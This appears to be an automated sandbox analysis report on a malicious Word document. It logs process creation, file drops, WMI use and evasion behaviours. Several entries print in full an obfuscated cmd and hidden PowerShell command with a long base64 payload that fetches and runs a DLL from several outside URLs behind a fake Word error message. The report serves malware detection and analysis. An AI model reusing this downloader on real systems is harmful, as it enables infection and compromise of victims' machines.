Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAEUAdAAgAE0ASwB1ACAAKAAgAFsAVABZAFAAZQBdACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQAiACAALQBGACAAJwBTAFkAcwBUACcALAAnAGUATQAuACcALAAnAGkAbwAuAEQASQAnACwAJwBPAFIAWQAnACwAJwByAEUAQwB0ACcAKQAgACkAOwAgACAAIAAgAFMAZQBUAC0AaQBUAEUATQAgACAAKAAnAHYAYQBSACcAKwAnAEkAYQBiAEwARQAnACsAJwA6AG0AQgB1ACcAKQAgACgAIAAgAFsAVABZAFAAZQBdACgAIgB7ADYAfQB7ADgAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADUAfQB7ADIAfQB7ADcAfQB7ADEAfQAiACAALQBmACcAUwB0AGUATQAnACwAJwBHAGUAcgAnACwAJwBNAGEAJwAsACcALgBuACcALAAnAGUAdAAuAHMAZQBSAFYASQBjAGUAcABPAGkAJwAsACcAbgB0ACcALAAnAHMAJwAsACcATgBBACcALAAnAFkAJwApACkAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwAnACsAJwBpAGwAJwApACsAKAAnAGUAbgAnACsAJwB0ACcAKQArACcAbAB5ACcAKwAoACcAQwBvAG4AdAAnACsAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABDAHYAbQBtAHEANABvAD0AJABRADIANgBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABFADEANgBIADsAJABKADEANgBKAD0AKAAnAE4AJwArACgAJwBfADAAJwArACcAUAAnACkAKQA7ACAAKABEAEkAcgAgAFYAYQByAGkAYQBiAEwARQA6AE0AawB1ACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAYABSAEUAQQB0AGAAZQBkAEkAYABSAEUAQwBgAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ACcAKwAnADAAfQBEAGIAXwBiAGgAJwArACcAMwAwACcAKwAnAHsAMAB9ACcAKwAnAFkAZgAnACsAJwA1AGIAZQA1AGcAewAwAH0AJwApACAALQBGACAAWwBjAGgAQQBSAF0AOQAyACkAKQA7ACQAQwAzADkAWQA9ACgAKAAnAFUANgAnACsAJwA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgAHYAQQBSAGkAYQBCAEwAZQAgACAAKAAiAG0AIgArACIAYgB1ACIAKQAgACAALQBWAEEAbAB1AGUAbwBOACAAIAApADoAOgAiAHMARQBjAHUAUgBJAFQAWQBwAHIAbwBUAGAAbwBgAGMAYABvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAcwAnACsAJwAxADIAJwApACkAOwAkAEYAMwA1AEkAPQAoACcASQAnACsAKAAnADQAJwArACcAXwBCACcAKQApADsAJABTAHcAcgBwADYAdABjACAAPQAgACgAKAAnAEEANgAnACsAJwA5ACcAKQArACcAUwAnACkAOwAkAFgAMgA3AEgAPQAoACcAQwAzACcAKwAnADMATwAnACkAOwAkAEkAbQBkADEAeQBjAGsAPQAkAEgATwBNAEUAKwAoACgAKAAnAFUATwAnACsAJwBIACcAKwAnAEQAYgBfACcAKQArACcAYgAnACsAKAAnAGgAMwAnACsAJwAwAFUATwAnACkAKwAoACcASABZACcAKwAnAGYAJwApACsAKAAnADUAYgBlADUAJwArACcAZwAnACsAJwBVAE8ASAAnACkAKQAuACIAUgBlAFAAYABsAEEAQwBlACIAKAAoACcAVQAnACsAJwBPAEgAJwApACwAWwBTAHQAcgBJAG4ARwBdAFsAYwBoAEEAcgBdADkAMgApACkAKwAkAFMAdwByAHAANgB0AGMAKwAoACgAJwAuACcAKwAnAGQAbAAnACkAKwAnAGwAJwApADsAJABLADQANwBWAD0AKAAnAFIAJwArACgAJwA0ACcAKwAnADkARwAnACkAKQA7ACQAQgA5AGYAaABiAHkAdgA9ACgAJwBdACcAKwAoACcAYQAnACsAJwBuAHcAWwAzAHMAOgAvAC8AYQBkAG0AJwArACcAaQBuAHQAJwArACcAawAuAGMAJwArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACkAKwAoACcAcAAtAGEAZABtACcAKwAnAGkAbgAvACcAKwAnAEwALwAnACkAKwAnAEAAJwArACgAJwBdAGEAJwArACcAbgAnACsAJwB3AFsAMwBzACcAKQArACcAOgAnACsAJwAvACcAKwAnAC8AbQAnACsAKAAnAGkAawBlACcAKwAnAGcAZQAnACkAKwAoACcAZQAnACsAJwByACcAKwAnAGkAbgBjAGsALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AYwAvACcAKwAnAFkAJwArACcAWQBzACcAKQArACcAYQAnACsAKAAnAC8AQABdACcAKwAnAGEAbgB3ACcAKwAnAFsAJwArACcAMwA6AC8ALwBmAHIAZQBlACcAKwAnAGwAYQBuAGMAJwArACcAZQAnACsAJwByAHcAJwApACsAKAAnAGUAYgBkAGUAcwBpACcAKwAnAGcAbgBlAHIAaAAnACsAJwB5AGQAJwApACsAKAAnAGUAcgAnACsA
PowerShell case anomaly found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAEUAdAAgAE0ASwB1ACAAKAAgAFsAVABZAFAAZQBdACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQAiACAALQBGACAAJwBTAFkAcwBUACcALAAnAGUATQAuACcALAAnAGkAbwAuAEQASQAnACwAJwBPAFIAWQAnACwAJwByAEUAQwB0ACcAKQAgACkAOwAgACAAIAAgAFMAZQBUAC0AaQBUAEUATQAgACAAKAAnAHYAYQBSACcAKwAnAEkAYQBiAEwARQAnACsAJwA6AG0AQgB1ACcAKQAgACgAIAAgAFsAVABZAFAAZQBdACgAIgB7ADYAfQB7ADgAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADUAfQB7ADIAfQB7ADcAfQB7ADEAfQAiACAALQBmACcAUwB0AGUATQAnACwAJwBHAGUAcgAnACwAJwBNAGEAJwAsACcALgBuACcALAAnAGUAdAAuAHMAZQBSAFYASQBjAGUAcABPAGkAJwAsACcAbgB0ACcALAAnAHMAJwAsACcATgBBACcALAAnAFkAJwApACkAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwAnACsAJwBpAGwAJwApACsAKAAnAGUAbgAnACsAJwB0ACcAKQArACcAbAB5ACcAKwAoACcAQwBvAG4AdAAnACsAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABDAHYAbQBtAHEANABvAD0AJABRADIANgBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABFADEANgBIADsAJABKADEANgBKAD0AKAAnAE4AJwArACgAJwBfADAAJwArACcAUAAnACkAKQA7ACAAKABEAEkAcgAgAFYAYQByAGkAYQBiAEwARQA6AE0AawB1ACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAYABSAEUAQQB0AGAAZQBkAEkAYABSAEUAQwBgAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ACcAKwAnADAAfQBEAGIAXwBiAGgAJwArACcAMwAwACcAKwAnAHsAMAB9ACcAKwAnAFkAZgAnACsAJwA1AGIAZQA1AGcAewAwAH0AJwApACAALQBGACAAWwBjAGgAQQBSAF0AOQAyACkAKQA7ACQAQwAzADkAWQA9ACgAKAAnAFUANgAnACsAJwA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgAHYAQQBSAGkAYQBCAEwAZQAgACAAKAAiAG0AIgArACIAYgB1ACIAKQAgACAALQBWAEEAbAB1AGUAbwBOACAAIAApADoAOgAiAHMARQBjAHUAUgBJAFQAWQBwAHIAbwBUAGAAbwBgAGMAYABvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAcwAnACsAJwAxADIAJwApACkAOwAkAEYAMwA1AEkAPQAoACcASQAnACsAKAAnADQAJwArACcAXwBCACcAKQApADsAJABTAHcAcgBwADYAdABjACAAPQAgACgAKAAnAEEANgAnACsAJwA5ACcAKQArACcAUwAnACkAOwAkAFgAMgA3AEgAPQAoACcAQwAzACcAKwAnADMATwAnACkAOwAkAEkAbQBkADEAeQBjAGsAPQAkAEgATwBNAEUAKwAoACgAKAAnAFUATwAnACsAJwBIACcAKwAnAEQAYgBfACcAKQArACcAYgAnACsAKAAnAGgAMwAnACsAJwAwAFUATwAnACkAKwAoACcASABZACcAKwAnAGYAJwApACsAKAAnADUAYgBlADUAJwArACcAZwAnACsAJwBVAE8ASAAnACkAKQAuACIAUgBlAFAAYABsAEEAQwBlACIAKAAoACcAVQAnACsAJwBPAEgAJwApACwAWwBTAHQAcgBJAG4ARwBdAFsAYwBoAEEAcgBdADkAMgApACkAKwAkAFMAdwByAHAANgB0AGMAKwAoACgAJwAuACcAKwAnAGQAbAAnACkAKwAnAGwAJwApADsAJABLADQANwBWAD0AKAAnAFIAJwArACgAJwA0ACcAKwAnADkARwAnACkAKQA7ACQAQgA5AGYAaABiAHkAdgA9ACgAJwBdACcAKwAoACcAYQAnACsAJwBuAHcAWwAzAHMAOgAvAC8AYQBkAG0AJwArACcAaQBuAHQAJwArACcAawAuAGMAJwArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACkAKwAoACcAcAAtAGEAZABtACcAKwAnAGkAbgAvACcAKwAnAEwALwAnACkAKwAnAEAAJwArACgAJwBdAGEAJwArACcAbgAnACsAJwB3AFsAMwBzACcAKQArACcAOgAnACsAJwAvACcAKwAnAC8AbQAnACsAKAAnAGkAawBlACcAKwAnAGcAZQAnACkAKwAoACcAZQAnACsAJwByACcAKwAnAGkAbgBjAGsALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AYwAvACcAKwAnAFkAJwArACcAWQBzACcAKQArACcAYQAnACsAKAAnAC8AQABdACcAKwAnAGEAbgB3ACcAKwAnAFsAJwArACcAMwA6AC8ALwBmAHIAZQBlACcAKwAnAGwAYQBuAGMAJwArACcAZQAnACsAJwByAHcAJwApACsAKAAnAGUAYgBkAGUAcwBpACcAKwAnAGcAbgBlAHIAaAAnACsAJwB5AGQAJwApACsAKAAnAGUAcgAnACsAJwBhAGIAYQAnACkAKwAoACcAZAAuACcAKwAnAGMAbwBtAC8AJwApACsAKAAnAGMAZ
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAEUAdAAgAE0ASwB1ACAAKAAgAFsAVABZAFAAZQBdACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQAiACAALQBGACAAJwBTAFkAcwBUACcALAAnAGUATQAuACcALAAnAGkAbwAuAEQASQAnACwAJwBPAFIAWQAnACwAJwByAEUAQwB0ACcAKQAgACkAOwAgACAAIAAgAFMAZQBUAC0AaQBUAEUATQAgACAAKAAnAHYAYQBSACcAKwAnAEkAYQBiAEwARQAnACsAJwA6AG0AQgB1ACcAKQAgACgAIAAgAFsAVABZAFAAZQBdACgAIgB7ADYAfQB7ADgAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADUAfQB7ADIAfQB7ADcAfQB7ADEAfQAiACAALQBmACcAUwB0AGUATQAnACwAJwBHAGUAcgAnACwAJwBNAGEAJwAsACcALgBuACcALAAnAGUAdAAuAHMAZQBSAFYASQBjAGUAcABPAGkAJwAsACcAbgB0ACcALAAnAHMAJwAsACcATgBBACcALAAnAFkAJwApACkAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwAnACsAJwBpAGwAJwApACsAKAAnAGUAbgAnACsAJwB0ACcAKQArACcAbAB5ACcAKwAoACcAQwBvAG4AdAAnACsAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABDAHYAbQBtAHEANABvAD0AJABRADIANgBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABFADEANgBIADsAJABKADEANgBKAD0AKAAnAE4AJwArACgAJwBfADAAJwArACcAUAAnACkAKQA7ACAAKABEAEkAcgAgAFYAYQByAGkAYQBiAEwARQA6AE0AawB1ACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAYABSAEUAQQB0AGAAZQBkAEkAYABSAEUAQwBgAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ACcAKwAnADAAfQBEAGIAXwBiAGgAJwArACcAMwAwACcAKwAnAHsAMAB9ACcAKwAnAFkAZgAnACsAJwA1AGIAZQA1AGcAewAwAH0AJwApACAALQBGACAAWwBjAGgAQQBSAF0AOQAyACkAKQA7ACQAQwAzADkAWQA9ACgAKAAnAFUANgAnACsAJwA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgAHYAQQBSAGkAYQBCAEwAZQAgACAAKAAiAG0AIgArACIAYgB1ACIAKQAgACAALQBWAEEAbAB1AGUAbwBOACAAIAApADoAOgAiAHMARQBjAHUAUgBJAFQAWQBwAHIAbwBUAGAAbwBgAGMAYABvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAcwAnACsAJwAxADIAJwApACkAOwAkAEYAMwA1AEkAPQAoACcASQAnACsAKAAnADQAJwArACcAXwBCACcAKQApADsAJABTAHcAcgBwADYAdABjACAAPQAgACgAKAAnAEEANgAnACsAJwA5ACcAKQArACcAUwAnACkAOwAkAFgAMgA3AEgAPQAoACcAQwAzACcAKwAnADMATwAnACkAOwAkAEkAbQBkADEAeQBjAGsAPQAkAEgATwBNAEUAKwAoACgAKAAnAFUATwAnACsAJwBIACcAKwAnAEQAYgBfACcAKQArACcAYgAnACsAKAAnAGgAMwAnACsAJwAwAFUATwAnACkAKwAoACcASABZACcAKwAnAGYAJwApACsAKAAnADUAYgBlADUAJwArACcAZwAnACsAJwBVAE8ASAAnACkAKQAuACIAUgBlAFAAYABsAEEAQwBlACIAKAAoACcAVQAnACsAJwBPAEgAJwApACwAWwBTAHQAcgBJAG4ARwBdAFsAYwBoAEEAcgBdADkAMgApACkAKwAkAFMAdwByAHAANgB0AGMAKwAoACgAJwAuACcAKwAnAGQAbAAnACkAKwAnAGwAJwApADsAJABLADQANwBWAD0AKAAnAFIAJwArACgAJwA0ACcAKwAnADkARwAnACkAKQA7ACQAQgA5AGYAaABiAHkAdgA9ACgAJwBdACcAKwAoACcAYQAnACsAJwBuAHcAWwAzAHMAOgAvAC8AYQBkAG0AJwArACcAaQBuAHQAJwArACcAawAuAGMAJwArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACkAKwAoACcAcAAtAGEAZABtACcAKwAnAGkAbgAvACcAKwAnAEwALwAnACkAKwAnAEAAJwArACgAJwBdAGEAJwArACcAbgAnACsAJwB3AFsAMwBzACcAKQArACcAOgAnACsAJwAvACcAKwAnAC8AbQAnACsAKAAnAGkAawBlACcAKwAnAGcAZQAnACkAKwAoACcAZQAnACsAJwByACcAKwAnAGkAbgBjAGsALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AYwAvACcAKwAnAFkAJwArACcAWQBzACcAKQArACcAYQAnACsAKAAnAC8AQABdACcAKwAnAGEAbgB3ACcAKwAnAFsAJwArACcAMwA6AC8ALwBmAHIAZQBlACcAKwAnAGwAYQBuAGMAJwArACcAZQAnACsAJwByAHcAJwApACsAKAAnAGUAYgBkAGUAcwBpACcAKwAnAGcAbgBlAHIAaAAnACsAJwB5AGQAJwApACsAKAAnAGUAcgAnACsAJwBhAGIAYQAnACkAKwAoACcAZAAuACcAKwAnAGMAbwBtAC8AJwApACsAKAAnAGMAZ Jump to behavior
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAEUAdAAgAE0ASwB1ACAAKAAgAFsAVABZAFAAZQBdACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQAiACAALQBGACAAJwBTAFkAcwBUACcALAAnAGUATQAuACcALAAnAGkAbwAuAEQASQAnACwAJwBPAFIAWQAnACwAJwByAEUAQwB0ACcAKQAgACkAOwAgACAAIAAgAFMAZQBUAC0AaQBUAEUATQAgACAAKAAnAHYAYQBSACcAKwAnAEkAYQBiAEwARQAnACsAJwA6AG0AQgB1ACcAKQAgACgAIAAgAFsAVABZAFAAZQBdACgAIgB7ADYAfQB7ADgAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADUAfQB7ADIAfQB7ADcAfQB7ADEAfQAiACAALQBmACcAUwB0AGUATQAnACwAJwBHAGUAcgAnACwAJwBNAGEAJwAsACcALgBuACcALAAnAGUAdAAuAHMAZQBSAFYASQBjAGUAcABPAGkAJwAsACcAbgB0ACcALAAnAHMAJwAsACcATgBBACcALAAnAFkAJwApACkAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwAnACsAJwBpAGwAJwApACsAKAAnAGUAbgAnACsAJwB0ACcAKQArACcAbAB5ACcAKwAoACcAQwBvAG4AdAAnACsAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABDAHYAbQBtAHEANABvAD0AJABRADIANgBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABFADEANgBIADsAJABKADEANgBKAD0AKAAnAE4AJwArACgAJwBfADAAJwArACcAUAAnACkAKQA7ACAAKABEAEkAcgAgAFYAYQByAGkAYQBiAEwARQA6AE0AawB1ACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAYABSAEUAQQB0AGAAZQBkAEkAYABSAEUAQwBgAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ACcAKwAnADAAfQBEAGIAXwBiAGgAJwArACcAMwAwACcAKwAnAHsAMAB9ACcAKwAnAFkAZgAnACsAJwA1AGIAZQA1AGcAewAwAH0AJwApACAALQBGACAAWwBjAGgAQQBSAF0AOQAyACkAKQA7ACQAQwAzADkAWQA9ACgAKAAnAFUANgAnACsAJwA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgAHYAQQBSAGkAYQBCAEwAZQAgACAAKAAiAG0AIgArACIAYgB1ACIAKQAgACAALQBWAEEAbAB1AGUAbwBOACAAIAApADoAOgAiAHMARQBjAHUAUgBJAFQAWQBwAHIAbwBUAGAAbwBgAGMAYABvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAcwAnACsAJwAxADIAJwApACkAOwAkAEYAMwA1AEkAPQAoACcASQAnACsAKAAnADQAJwArACcAXwBCACcAKQApADsAJABTAHcAcgBwADYAdABjACAAPQAgACgAKAAnAEEANgAnACsAJwA5ACcAKQArACcAUwAnACkAOwAkAFgAMgA3AEgAPQAoACcAQwAzACcAKwAnADMATwAnACkAOwAkAEkAbQBkADEAeQBjAGsAPQAkAEgATwBNAEUAKwAoACgAKAAnAFUATwAnACsAJwBIACcAKwAnAEQAYgBfACcAKQArACcAYgAnACsAKAAnAGgAMwAnACsAJwAwAFUATwAnACkAKwAoACcASABZACcAKwAnAGYAJwApACsAKAAnADUAYgBlADUAJwArACcAZwAnACsAJwBVAE8ASAAnACkAKQAuACIAUgBlAFAAYABsAEEAQwBlACIAKAAoACcAVQAnACsAJwBPAEgAJwApACwAWwBTAHQAcgBJAG4ARwBdAFsAYwBoAEEAcgBdADkAMgApACkAKwAkAFMAdwByAHAANgB0AGMAKwAoACgAJwAuACcAKwAnAGQAbAAnACkAKwAnAGwAJwApADsAJABLADQANwBWAD0AKAAnAFIAJwArACgAJwA0ACcAKwAnADkARwAnACkAKQA7ACQAQgA5AGYAaABiAHkAdgA9ACgAJwBdACcAKwAoACcAYQAnACsAJwBuAHcAWwAzAHMAOgAvAC8AYQBkAG0AJwArACcAaQBuAHQAJwArACcAawAuAGMAJwArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACkAKwAoACcAcAAtAGEAZABtACcAKwAnAGkAbgAvACcAKwAnAEwALwAnACkAKwAnAEAAJwArACgAJwBdAGEAJwArACcAbgAnACsAJwB3AFsAMwBzACcAKQArACcAOgAnACsAJwAvACcAKwAnAC8AbQAnACsAKAAnAGkAawBlACcAKwAnAGcAZQAnACkAKwAoACcAZQAnACsAJwByACcAKwAnAGkAbgBjAGsALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AYwAvACcAKwAnAFkAJwArACcAWQBzACcAKQArACcAYQAnACsAKAAnAC8AQABdACcAKwAnAGEAbgB3ACcAKwAnAFsAJwArACcAMwA6AC8ALwBmAHIAZQBlACcAKwAnAGwAYQBuAGMAJwArACcAZQAnACsAJwByAHcAJwApACsAKAAnAGUAYgBkAGUAcwBpACcAKwAnAGcAbgBlAHIAaAAnACsAJwB5AGQAJwApACsAKAAnAGUAcgAnACsAJwBhAGIAYQAnACkAKwAoACcAZAAuACcAKwAnAGMAbwBtAC8AJwApACsAKAAnAGMAZ
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAEUAdAAgAE0ASwB1ACAAKAAgAFsAVABZAFAAZQBdACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQAiACAALQBGACAAJwBTAFkAcwBUACcALAAnAGUATQAuACcALAAnAGkAbwAuAEQASQAnACwAJwBPAFIAWQAnACwAJwByAEUAQwB0ACcAKQAgACkAOwAgACAAIAAgAFMAZQBUAC0AaQBUAEUATQAgACAAKAAnAHYAYQBSACcAKwAnAEkAYQBiAEwARQAnACsAJwA6AG0AQgB1ACcAKQAgACgAIAAgAFsAVABZAFAAZQBdACgAIgB7ADYAfQB7ADgAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADUAfQB7ADIAfQB7ADcAfQB7ADEAfQAiACAALQBmACcAUwB0AGUATQAnACwAJwBHAGUAcgAnACwAJwBNAGEAJwAsACcALgBuACcALAAnAGUAdAAuAHMAZQBSAFYASQBjAGUAcABPAGkAJwAsACcAbgB0ACcALAAnAHMAJwAsACcATgBBACcALAAnAFkAJwApACkAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwAnACsAJwBpAGwAJwApACsAKAAnAGUAbgAnACsAJwB0ACcAKQArACcAbAB5ACcAKwAoACcAQwBvAG4AdAAnACsAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABDAHYAbQBtAHEANABvAD0AJABRADIANgBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABFADEANgBIADsAJABKADEANgBKAD0AKAAnAE4AJwArACgAJwBfADAAJwArACcAUAAnACkAKQA7ACAAKABEAEkAcgAgAFYAYQByAGkAYQBiAEwARQA6AE0AawB1ACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAYABSAEUAQQB0AGAAZQBkAEkAYABSAEUAQwBgAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ACcAKwAnADAAfQBEAGIAXwBiAGgAJwArACcAMwAwACcAKwAnAHsAMAB9ACcAKwAnAFkAZgAnACsAJwA1AGIAZQA1AGcAewAwAH0AJwApACAALQBGACAAWwBjAGgAQQBSAF0AOQAyACkAKQA7ACQAQwAzADkAWQA9ACgAKAAnAFUANgAnACsAJwA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgAHYAQQBSAGkAYQBCAEwAZQAgACAAKAAiAG0AIgArACIAYgB1ACIAKQAgACAALQBWAEEAbAB1AGUAbwBOACAAIAApADoAOgAiAHMARQBjAHUAUgBJAFQAWQBwAHIAbwBUAGAAbwBgAGMAYABvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAcwAnACsAJwAxADIAJwApACkAOwAkAEYAMwA1AEkAPQAoACcASQAnACsAKAAnADQAJwArACcAXwBCACcAKQApADsAJABTAHcAcgBwADYAdABjACAAPQAgACgAKAAnAEEANgAnACsAJwA5ACcAKQArACcAUwAnACkAOwAkAFgAMgA3AEgAPQAoACcAQwAzACcAKwAnADMATwAnACkAOwAkAEkAbQBkADEAeQBjAGsAPQAkAEgATwBNAEUAKwAoACgAKAAnAFUATwAnACsAJwBIACcAKwAnAEQAYgBfACcAKQArACcAYgAnACsAKAAnAGgAMwAnACsAJwAwAFUATwAnACkAKwAoACcASABZACcAKwAnAGYAJwApACsAKAAnADUAYgBlADUAJwArACcAZwAnACsAJwBVAE8ASAAnACkAKQAuACIAUgBlAFAAYABsAEEAQwBlACIAKAAoACcAVQAnACsAJwBPAEgAJwApACwAWwBTAHQAcgBJAG4ARwBdAFsAYwBoAEEAcgBdADkAMgApACkAKwAkAFMAdwByAHAANgB0AGMAKwAoACgAJwAuACcAKwAnAGQAbAAnACkAKwAnAGwAJwApADsAJABLADQANwBWAD0AKAAnAFIAJwArACgAJwA0ACcAKwAnADkARwAnACkAKQA7ACQAQgA5AGYAaABiAHkAdgA9ACgAJwBdACcAKwAoACcAYQAnACsAJwBuAHcAWwAzAHMAOgAvAC8AYQBkAG0AJwArACcAaQBuAHQAJwArACcAawAuAGMAJwArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACkAKwAoACcAcAAtAGEAZABtACcAKwAnAGkAbgAvACcAKwAnAEwALwAnACkAKwAnAEAAJwArACgAJwBdAGEAJwArACcAbgAnACsAJwB3AFsAMwBzACcAKQArACcAOgAnACsAJwAvACcAKwAnAC8AbQAnACsAKAAnAGkAawBlACcAKwAnAGcAZQAnACkAKwAoACcAZQAnACsAJwByACcAKwAnAGkAbgBjAGsALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AYwAvACcAKwAnAFkAJwArACcAWQBzACcAKQArACcAYQAnACsAKAAnAC8AQABdACcAKwAnAGEAbgB3ACcAKwAnAFsAJwArACcAMwA6AC8ALwBmAHIAZQBlACcAKwAnAGwAYQBuAGMAJwArACcAZQAnACsAJwByAHcAJwApACsAKAAnAGUAYgBkAGUAcwBpACcAKwAnAGcAbgBlAHIAaAAnACsAJwB5AGQAJwApACsAKAAnAGUAcgAnACsAJwBhAGIAYQAnACkAKwAoACcAZAAuACcAKwAnAGMAbwBtAC8AJwApACsAKAAnAGMAZ Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 6_2_1000C620
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_10008085 push ecx; ret 6_2_10008098
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_10004ADA push ecx; ret 6_2_10004AED

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Db_bh30\Yf5be5g\A69S.dll Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe PE file moved: C:\Windows\SysWOW64\Hvayvymqsut\qurpqzzbqs.opz Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Hvayvymqsut\qurpqzzbqs.opz:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Wxohzthmdfatnoq\lqaarocqybnpxa.zgv:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Bajrh\emiy.exu:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
